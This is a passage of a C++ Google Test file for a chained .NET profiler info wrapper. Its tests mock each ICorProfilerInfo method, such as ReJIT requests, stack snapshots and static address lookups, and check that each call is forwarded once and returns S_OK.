TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_SetFunctionReJIT_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, SetFunctionReJIT(_))
.WillByDefault(Invoke([this](/* [in] */ FunctionID functionId) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, SetFunctionReJIT(_)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->SetFunctionReJIT(0));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_ForceGC_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, ForceGC())
.WillByDefault(Invoke([this](void) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, ForceGC()).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->ForceGC());
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_SetILInstrumentedCodeMap_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, SetILInstrumentedCodeMap(_, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionID functionId,
/* [in] */ BOOL fStartJit,
/* [in] */ ULONG cILMapEntries,
/* [size_is][in] */ COR_IL_MAP rgILMapEntries[]) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, SetILInstrumentedCodeMap(_, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->SetILInstrumentedCodeMap(0, 0, 0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetInprocInspectionInterface_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetInprocInspectionInterface(_))
.WillByDefault(Invoke([this](/* [out] */ IUnknown **ppicd) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetInprocInspectionInterface(_)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetInprocInspectionInterface(nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetInprocInspectionIThisThread_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetInprocInspectionIThisThread(_))
.WillByDefault(Invoke([this](/* [out] */ IUnknown **ppicd) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetInprocInspectionIThisThread(_)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetInprocInspectionIThisThread(nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetThreadContext_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetThreadContext(_, _))
.WillByDefault(Invoke([this](/* [in] */ ThreadID threadId,
/* [out] */ ContextID *pContextId) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetThreadContext(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetThreadContext(0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_BeginInprocDebugging_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, BeginInprocDebugging(_, _))
.WillByDefault(Invoke([this](/* [in] */ BOOL fThisThreadOnly,
/* [out] */ DWORD *pdwProfilerContext) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, BeginInprocDebugging(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->BeginInprocDebugging(0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_EndInprocDebugging_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, EndInprocDebugging(_))
.WillByDefault(Invoke([this](/* [in] */ DWORD dwProfilerContext) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, EndInprocDebugging(_)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->EndInprocDebugging(0));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetILToNativeMapping_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetILToNativeMapping(_, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionID functionId,
/* [in] */ ULONG32 cMap,
/* [out] */ ULONG32 *pcMap,
/* [length_is][size_is][out] */ COR_DEBUG_IL_TO_NATIVE_MAP map[]) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetILToNativeMapping(_, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetILToNativeMapping(0, 0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_DoStackSnapshot_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, DoStackSnapshot(_, _, _, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ThreadID thread,
/* [in] */ StackSnapshotCallback *callback,
/* [in] */ ULONG32 infoFlags,
/* [in] */ void *clientData,
/* [size_is][in] */ BYTE context[],
/* [in] */ ULONG32 contextSize) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, DoStackSnapshot(_, _, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->DoStackSnapshot(0, nullptr, 0, nullptr, nullptr, 0));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_SetEnterLeaveFunctionHooks2_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, SetEnterLeaveFunctionHooks2(_, _, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionEnter2 *pFuncEnter,
/* [in] */ FunctionLeave2 *pFuncLeave,
/* [in] */ FunctionTailcall2 *pFuncTailcall) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, SetEnterLeaveFunctionHooks2(_, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->SetEnterLeaveFunctionHooks2(nullptr, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetFunctionInfo2_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetFunctionInfo2(_, _, _, _, _, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionID funcId,
/* [in] */ COR_PRF_FRAME_INFO frameInfo,
/* [out] */ ClassID *pClassId,
/* [out] */ ModuleID *pModuleId,
/* [out] */ mdToken *pToken,
/* [in] */ ULONG32 cTypeArgs,
/* [out] */ ULONG32 *pcTypeArgs,
/* [out] */ ClassID typeArgs[]) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetFunctionInfo2(_, _, _, _, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetFunctionInfo2(0, 0, nullptr, nullptr, nullptr, 0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetStringLayout_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetStringLayout(_, _, _))
.WillByDefault(Invoke([this](/* [out] */ ULONG *pBufferLengthOffset,
/* [out] */ ULONG *pStringLengthOffset,
/* [out] */ ULONG *pBufferOffset) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetStringLayout(_, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetStringLayout(nullptr, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetClassLayout_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetClassLayout(_, _, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ClassID classID,
/* [out][in] */ COR_FIELD_OFFSET rFieldOffset[],
/* [in] */ ULONG cFieldOffset,
/* [out] */ ULONG *pcFieldOffset,
/* [out] */ ULONG *pulClassSize) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetClassLayout(_, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetClassLayout(0, nullptr, 0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetClassIDInfo2_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetClassIDInfo2(_, _, _, _, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ClassID classId,
/* [out] */ ModuleID *pModuleId,
/* [out] */ mdTypeDef *pTypeDefToken,
/* [out] */ ClassID *pParentClassId,
/* [in] */ ULONG32 cNumTypeArgs,
/* [out] */ ULONG32 *pcNumTypeArgs,
/* [out] */ ClassID typeArgs[]) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetClassIDInfo2(_, _, _, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetClassIDInfo2(0, nullptr, nullptr, nullptr, 0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetCodeInfo2_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetCodeInfo2(_, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionID functionID,
/* [in] */ ULONG32 cCodeInfos,
/* [out] */ ULONG32 *pcCodeInfos,
/* [length_is][size_is][out] */ COR_PRF_CODE_INFO codeInfos[]) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetCodeInfo2(_, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetCodeInfo2(0, 0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetClassFromTokenAndTypeArgs_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetClassFromTokenAndTypeArgs(_, _, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ModuleID moduleID,
/* [in] */ mdTypeDef typeDef,
/* [in] */ ULONG32 cTypeArgs,
/* [size_is][in] */ ClassID typeArgs[],
/* [out] */ ClassID *pClassID) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetClassFromTokenAndTypeArgs(_, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetClassFromTokenAndTypeArgs(0, 0, 0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetFunctionFromTokenAndTypeArgs_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetFunctionFromTokenAndTypeArgs(_, _, _, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ModuleID moduleID,
/* [in] */ mdMethodDef funcDef,
/* [in] */ ClassID classId,
/* [in] */ ULONG32 cTypeArgs,
/* [size_is][in] */ ClassID typeArgs[],
/* [out] */ FunctionID *pFunctionID) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetFunctionFromTokenAndTypeArgs(_, _, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetFunctionFromTokenAndTypeArgs(0, 0, 0, 0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_EnumModuleFrozenObjects_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, EnumModuleFrozenObjects(_, _))
.WillByDefault(Invoke([this](/* [in] */ ModuleID moduleID,
/* [out] */ ICorProfilerObjectEnum **ppEnum) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, EnumModuleFrozenObjects(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->EnumModuleFrozenObjects(0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetArrayObjectInfo_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetArrayObjectInfo(_, _, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ObjectID objectId,
/* [in] */ ULONG32 cDimensions,
/* [size_is][out] */ ULONG32 pDimensionSizes[],
/* [size_is][out] */ int pDimensionLowerBounds[],
/* [out] */ BYTE **ppData) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetArrayObjectInfo(_, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetArrayObjectInfo(0, 0, nullptr, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetBoxClassLayout_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetBoxClassLayout(_, _))
.WillByDefault(Invoke([this](/* [in] */ ClassID classId,
/* [out] */ ULONG32 *pBufferOffset) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetBoxClassLayout(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetBoxClassLayout(0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetThreadAppDomain_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetThreadAppDomain(_, _))
.WillByDefault(Invoke([this](/* [in] */ ThreadID threadId,
/* [out] */ AppDomainID *pAppDomainId) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetThreadAppDomain(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetThreadAppDomain(0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetRVAStaticAddress_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetRVAStaticAddress(_, _, _))
.WillByDefault(Invoke([this](/* [in] */ ClassID classId,
/* [in] */ mdFieldDef fieldToken,
/* [out] */ void **ppAddress) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetRVAStaticAddress(_, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetRVAStaticAddress(0, 0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetAppDomainStaticAddress_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetAppDomainStaticAddress(_, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ClassID classId,
/* [in] */ mdFieldDef fieldToken,
/* [in] */ AppDomainID appDomainId,
/* [out] */ void **ppAddress) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetAppDomainStaticAddress(_, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetAppDomainStaticAddress(0, 0, 0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetThreadStaticAddress_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetThreadStaticAddress(_, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ClassID classId,
/* [in] */ mdFieldDef fieldToken,
/* [in] */ ThreadID threadId,
/* [out] */ void **ppAddress) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetThreadStaticAddress(_, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetThreadStaticAddress(0, 0, 0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetContextStaticAddress_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetContextStaticAddress(_, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ClassID classId,
/* [in] */ mdFieldDef fieldToken,
/* [in] */ ContextID contextId,
/* [out] */ void **ppAddress) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetContextStaticAddress(_, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetContextStaticAddress(0, 0, 0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetStaticFieldInfo_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetStaticFieldInfo(_, _, _))
.WillByDefault(Invoke([this](/* [in] */ ClassID classId,
/* [in] */ mdFieldDef fieldToken,
/* [out] */ COR_PRF_STATIC_TYPE *pFieldInfo) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetStaticFieldInfo(_, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetStaticFieldInfo(0, 0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetGenerationBounds_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetGenerationBounds(_, _, _))
.WillByDefault(Invoke([this](/* [in] */ ULONG cObjectRanges,
/* [out] */ ULONG *pcObjectRanges,
/* [length_is][size_is][out] */ COR_PRF_GC_GENERATION_RANGE ranges[]) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetGenerationBounds(_, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetGenerationBounds(0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetObjectGeneration_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetObjectGeneration(_, _))
.WillByDefault(Invoke([this](/* [in] */ ObjectID objectId,
/* [out] */ COR_PRF_GC_GENERATION_RANGE *range) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetObjectGeneration(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetObjectGeneration(0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetNotifiedExceptionClauseInfo_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetNotifiedExceptionClauseInfo(_))
.WillByDefault(Invoke([this](/* [out] */ COR_PRF_EX_CLAUSE_INFO *pinfo) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetNotifiedExceptionClauseInfo(_)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetNotifiedExceptionClauseInfo(nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_EnumJITedFunctions_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, EnumJITedFunctions(_))
.WillByDefault(Invoke([this](/* [out] */ ICorProfilerFunctionEnum **ppEnum) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, EnumJITedFunctions(_)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->EnumJITedFunctions(nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_RequestProfilerDetach_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, RequestProfilerDetach(_))
.WillByDefault(Invoke([this](/* [in] */ DWORD dwExpectedCompletionMilliseconds) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, RequestProfilerDetach(_)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->RequestProfilerDetach(0));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_SetFunctionIDMapper2_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, SetFunctionIDMapper2(_, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionIDMapper2 *pFunc,
/* [in] */ void *clientData) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, SetFunctionIDMapper2(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->SetFunctionIDMapper2(nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetStringLayout2_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetStringLayout2(_, _))
.WillByDefault(Invoke([this](/* [out] */ ULONG *pStringLengthOffset,
/* [out] */ ULONG *pBufferOffset) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetStringLayout2(_, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetStringLayout2(nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_SetEnterLeaveFunctionHooks3_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, SetEnterLeaveFunctionHooks3(_, _, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionEnter3 *pFuncEnter3,
/* [in] */ FunctionLeave3 *pFuncLeave3,
/* [in] */ FunctionTailcall3 *pFuncTailcall3) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, SetEnterLeaveFunctionHooks3(_, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->SetEnterLeaveFunctionHooks3(nullptr, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_SetEnterLeaveFunctionHooks3WithInfo_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, SetEnterLeaveFunctionHooks3WithInfo(_, _, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionEnter3WithInfo *pFuncEnter3WithInfo,
/* [in] */ FunctionLeave3WithInfo *pFuncLeave3WithInfo,
/* [in] */ FunctionTailcall3WithInfo *pFuncTailcall3WithInfo) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, SetEnterLeaveFunctionHooks3WithInfo(_, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->SetEnterLeaveFunctionHooks3WithInfo(nullptr, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetFunctionEnter3Info_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetFunctionEnter3Info(_, _, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionID functionId,
/* [in] */ COR_PRF_ELT_INFO eltInfo,
/* [out] */ COR_PRF_FRAME_INFO *pFrameInfo,
/* [out][in] */ ULONG *pcbArgumentInfo,
/* [size_is][out] */ COR_PRF_FUNCTION_ARGUMENT_INFO *pArgumentInfo) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetFunctionEnter3Info(_, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetFunctionEnter3Info(0, 0, nullptr, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetFunctionLeave3Info_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetFunctionLeave3Info(_, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionID functionId,
/* [in] */ COR_PRF_ELT_INFO eltInfo,
/* [out] */ COR_PRF_FRAME_INFO *pFrameInfo,
/* [out] */ COR_PRF_FUNCTION_ARGUMENT_RANGE *pRetvalRange) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetFunctionLeave3Info(_, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetFunctionLeave3Info(0, 0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetFunctionTailcall3Info_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetFunctionTailcall3Info(_, _, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionID functionId,
/* [in] */ COR_PRF_ELT_INFO eltInfo,
/* [out] */ COR_PRF_FRAME_INFO *pFrameInfo) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetFunctionTailcall3Info(_, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetFunctionTailcall3Info(0, 0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_EnumModules_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, EnumModules(_))
.WillByDefault(Invoke([this](/* [out] */ ICorProfilerModuleEnum **ppEnum) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, EnumModules(_)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->EnumModules(nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetRuntimeInformation_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetRuntimeInformation(_, _, _, _, _, _, _, _, _))
.WillByDefault(Invoke([this](/* [out] */ USHORT *pClrInstanceId,
/* [out] */ COR_PRF_RUNTIME_TYPE *pRuntimeType,
/* [out] */ USHORT *pMajorVersion,
/* [out] */ USHORT *pMinorVersion,
/* [out] */ USHORT *pBuildNumber,
/* [out] */ USHORT *pQFEVersion,
/* [in] */ ULONG cchVersionString,
/* [out] */ ULONG *pcchVersionString,
/* [annotation][out] */
_Out_writes_to_(cchVersionString, *pcchVersionString) WCHAR szVersionString[]) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetRuntimeInformation(_, _, _, _, _, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetRuntimeInformation(nullptr, nullptr, nullptr, nullptr, nullptr, nullptr, 0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetThreadStaticAddress2_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetThreadStaticAddress2(_, _, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ClassID classId,
/* [in] */ mdFieldDef fieldToken,
/* [in] */ AppDomainID appDomainId,
/* [in] */ ThreadID threadId,
/* [out] */ void **ppAddress) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetThreadStaticAddress2(_, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetThreadStaticAddress2(0, 0, 0, 0, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetAppDomainsContainingModule_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetAppDomainsContainingModule(_, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ModuleID moduleId,
/* [in] */ ULONG32 cAppDomainIds,
/* [out] */ ULONG32 *pcAppDomainIds,
/* [length_is][size_is][out] */ AppDomainID appDomainIds[]) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetAppDomainsContainingModule(_, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetAppDomainsContainingModule(0, 0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetModuleInfo2_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetModuleInfo2(_, _, _, _, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ModuleID moduleId,
/* [out] */ LPCBYTE *ppBaseLoadAddress,
/* [in] */ ULONG cchName,
/* [out] */ ULONG *pcchName,
/* [annotation][out] */
_Out_writes_to_(cchName, *pcchName) WCHAR szName[],
/* [out] */ AssemblyID *pAssemblyId,
/* [out] */ DWORD *pdwModuleFlags) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, GetModuleInfo2(_, _, _, _, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->GetModuleInfo2(0, nullptr, 0, nullptr, nullptr, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_EnumThreads_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, EnumThreads(_))
.WillByDefault(Invoke([this](/* [out] */ ICorProfilerThreadEnum **ppEnum) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, EnumThreads(_)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->EnumThreads(nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_InitializeCurrentThread_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, InitializeCurrentThread())
.WillByDefault(Invoke([this]() {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, InitializeCurrentThread()).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->InitializeCurrentThread());
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_RequestReJIT_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, RequestReJIT(_, _, _))
.WillByDefault(Invoke([this](/* [in] */ ULONG cFunctions,
/* [size_is][in] */ ModuleID moduleIds[],
/* [size_is][in] */ mdMethodDef methodIds[]) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, RequestReJIT(_, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->RequestReJIT(0, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_RequestRevert_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, RequestRevert(_, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ ULONG cFunctions,
/* [size_is][in] */ ModuleID moduleIds[],
/* [size_is][in] */ mdMethodDef methodIds[],
/* [size_is][out] */ HRESULT status[]) {
return S_OK;
}));
EXPECT_CALL(*mockProfilerInfo_, RequestRevert(_, _, _, _)).Times(1);
ASSERT_EQ(S_OK, testProfilerInfo_->RequestRevert(0, nullptr, nullptr, nullptr));
}
TEST_F(ProfilerInfoBaseTest, ChainedProfilerInfo_WillForwardCallsTo_GetCodeInfo3_AndReturnSuccess)
{
ON_CALL(*mockProfilerInfo_, GetCodeInfo3(_, _, _, _, _))
.WillByDefault(Invoke([this](/* [in] */ FunctionID functionID,
/* [in] */ ReJITID reJitId,
/* [in] */ ULONG32 cCodeInfos,
/* [out] */ ULONG32 *pcCodeInfos,
/* [length_is][size_is][out] */ COR_PRF_CODE_INFO codeInfos[]) {
return S_OK;
}));
